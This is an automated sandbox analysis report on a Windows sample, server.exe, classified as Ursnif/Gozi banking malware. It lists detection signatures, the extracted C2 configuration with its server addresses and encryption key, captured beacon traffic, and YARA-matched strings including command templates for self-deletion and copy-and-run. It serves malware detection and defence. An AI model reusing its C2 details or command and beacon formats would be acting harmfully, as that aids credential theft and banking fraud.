
Windows Analysis Report
server.exe

Overview

General Information

Sample Name: server.exe
Analysis ID: 827617
MD5: a4071382a33bb9fa55ff8bf8b111bc39
SHA1: 4eb7f936efe97a88aad9d38452829cd63a3624b2
SHA256: 04234564fe449d51f7e685455fcfafb3b7721a0b7d1551e3a370f579a3530e04
Tags: agenziaentrate, exe, gozi, isfb, mef, mise, ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Yara detected Ursnif
Found evasive API chain (may stop execution after checking system information)
Writes or reads registry keys via WMI
Writes registry values via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Contains functionality to call native functions
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Contains functionality to dynamically determine API calls

Classification

  • System is w10x64
  • server.exe (PID: 5084 cmdline: C:\Users\user\Desktop\server.exe MD5: A4071382A33BB9FA55FF8BF8B111BC39)
  • cleanup
Name: Gozi, Ursnif
Description: 2000 Ursnif aka Snifula; 2006 Gozi v1.0, Gozi CRM, CRM, Papras; 2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia (*) -> 2010 Gozi Prinimalka -> Vawtrak/Neverquest. In 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed. It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula. In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.
Attribution: No Attribution
Blogpost URLs: -
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi
{"RSA Public Key": "ScCitKVnthsrIejolA7zuBWvwII2di/DH3GlyTtkQAl5+NYn11P8hoApgIAx8QgiEaRicK3ETZq3j2ua44XjJevEH0XzzTqZAT3wkYswDxrBkgZMCwo6YXkhXitvoh3eARDtRDEkQsoLHZ9GnSskgPPZhcXZcW5DEVGUxmtbXgDaTXEEASp94TxsSTq8LcHFcoUD/3qCUIKISKD7sIV0hgpJQ8kx5Fr/zREoX54YDyuxKi/xJ3SBIavWF9UPU+YwvxpBDYMFrMsKJrjGUlpoQZehisJjttb1cTtggelEGnFr5O2GXefQUuwrSizDeVnMRSAHdds+AiqlPxEl1nFzSfnHhHtw7Ql8JtPTws7Z1Ho=", "c2_domain": ["checklist.skype.com", "5.44.43.17", "31.41.44.108", "62.173.138.213", "109.248.11.174"], "botnet": "7714", "server": "50", "serpent_key": "lk8hY4nisKQzZKXE", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Source | Rule | Description | Author | Strings
00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Gozi_fd494041 | unknown | unknown
  • 0x1228:$a1: /C ping localhost -n %u && del "%s"
  • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
  • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
  • 0xa9c:$a5: filename="%.4u.%lu"
  • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xe6d:$a9: &whoami=%s
  • 0xe56:$a10: %u.%u_%u_%u_x%u
  • 0xd63:$a11: size=%u&hash=0x%08x
  • 0xb1d:$a12: &uptime=%u
  • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
  • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Gozi_261f5ac5 | unknown | unknown
  • 0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
  • 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
  • 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
  • 0xd96:$a9: Software\AppDataLow\Software\Microsoft\
  • 0x1ca0:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Gozi_fd494041 | unknown | unknown
  • 0x1228:$a1: /C ping localhost -n %u && del "%s"
  • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
  • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
  • 0xa9c:$a5: filename="%.4u.%lu"
  • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xe6d:$a9: &whoami=%s
  • 0xe56:$a10: %u.%u_%u_%u_x%u
  • 0xd63:$a11: size=%u&hash=0x%08x
  • 0xb1d:$a12: &uptime=%u
  • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
  • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
      No Sigma rule has matched
Timestamp: 03/16/23-07:23:24.710750
Source IP: 192.168.2.4
Destination IP: 5.44.43.17
Source Port: 49695
Destination Port: 80
SID: 2033203
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 03/16/23-07:23:24.710750
Source IP: 192.168.2.4
Destination IP: 5.44.43.17
Source Port: 49695
Destination Port: 80
SID: 2033204
Protocol: TCP
Classtype: A Network Trojan was detected


      AV Detection

Source: server.exe | Virustotal: Detection: 49%
Source: http://31.41.44.108/ | Virustotal: Detection: 6%
Source: server.exe | Joe Sandbox ML: detected
Source: 0.2.server.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen7
Source: 00000000.00000003.294009819.0000000002B70000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: Ursnif (same configuration as listed above: RSA public key, c2_domain list checklist.skype.com / 5.44.43.17 / 31.41.44.108 / 62.173.138.213 / 109.248.11.174, botnet 7714, server 50, serpent_key lk8hY4nisKQzZKXE, sleep_time 1, CONF_TIMEOUT 20, SetWaitableTimer_value 0)

      Compliance

Source: C:\Users\user\Desktop\server.exe | Unpacked PE file: 0.2.server.exe.400000.0.unpack
Source: server.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\server.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
      Source: Binary string: C:\vecupeha_kocem\hanowida_tiyecu.pdb source: server.exe

      Networking

Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49695 -> 5.44.43.17:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49695 -> 5.44.43.17:80
Source: global traffic | HTTP traffic detected:
  GET /drew/L2Ctnat9/M34_2FbYe0ZC9ndvN_2FGmY/27aAwtqf0J/wCDEgzGms_2BItZWy/3Y988SJvsZ8d/G3blEZDMCSE/Bi4DBDrc6fsxs_/2B3aB3ncMi0pp47wsona_/2Bg3i_2FKiTRHGjN/oHTatVB82_2Bul8/TJX3dbVMmJ11Klc61D/Pyd9ldtz9/oHshYCyo8YOqEvONS9ad/fWHuvb04Djokj2GS9tP/hFDYxrH3WbHt3WZEGKZKd7/8Da2SdLCDRHMt/cExDArjC/xj0VJZ2pcmhn5qbmTarHUT8/nHF70Bsig92/tQ.jlk HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: 5.44.43.17
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: Joe Sandbox View | ASN Name: MGNHOST-ASRU MGNHOST-ASRU
Source: unknown | DNS traffic detected: query: checklist.skype.com replaycode: Name error (3)
Source: unknown | TCP traffic detected without corresponding DNS query: 5.44.43.17 (5 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 31.41.44.108 (3 occurrences)
Source: server.exe, 00000000.00000002.561015752.00000000048DC000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://31.41.
Source: server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://31.41.44.108/
Source: server.exe, 00000000.00000002.560887520.0000000002DB5000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://31.41.44.108/drew/kSoLH6P3P3ScRZ8VG2/ZyGmCU1Si/Pg3By2fxJOOkAR8rwi0H/T_2F0osErSjTF4ug24E/qpC0b
Source: server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://31.41.44.108/ows
Source: server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://5.44.43.17/
Source: server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://5.44.43.17/H
Source: server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://5.44.43.17/dows
Source: server.exe, 00000000.00000002.560824916.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://5.44.43.17/drew/L2Ctnat9/M34_2FbYe0ZC9ndvN_2FGmY/27aAwtqf0J/wCDEgzGms_2BItZWy/3Y988SJvsZ8d/G3
Source: server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://checklist.skype.com/drew/t0_2F8jI1aC786/3pDAJvqTmNvXKWVK8YEK3/dSLDX7_2Bak45Arz/NG3260JY92AIOa
Source: unknown | DNS traffic detected: queries for: checklist.skype.com

      Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437607337.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437902952.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437680280.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437880464.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.436425972.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.561151548.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437645117.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: server.exe PID: 5084, type: MEMORYSTR
Source: server.exe, 00000000.00000002.560824916.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      E-Banking Fraud

Source: Yara match | File source: 00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437607337.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437902952.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437680280.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437880464.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.436425972.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.561151548.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437645117.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: server.exe PID: 5084, type: MEMORYSTR

      System Summary

Source: 00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.437607337.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.437607337.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.437902952.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.437902952.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.437680280.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.437680280.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.437880464.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.437880464.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.436425972.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.436425972.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000002.561151548.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000002.561151548.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000002.560851312.0000000002D56000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.560764513.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000003.437645117.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.437645117.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: server.exe PID: 5084, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: server.exe PID: 5084, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: C:\Users\user\Desktop\server.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\server.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\server.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\server.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\server.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\server.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\server.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: server.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.437607337.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.437607337.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.437902952.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.437902952.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.437680280.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.437680280.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.437880464.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.437880464.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.436425972.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.436425972.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000002.561151548.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000002.561151548.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000002.560851312.0000000002D56000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.560764513.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000003.437645117.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.437645117.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
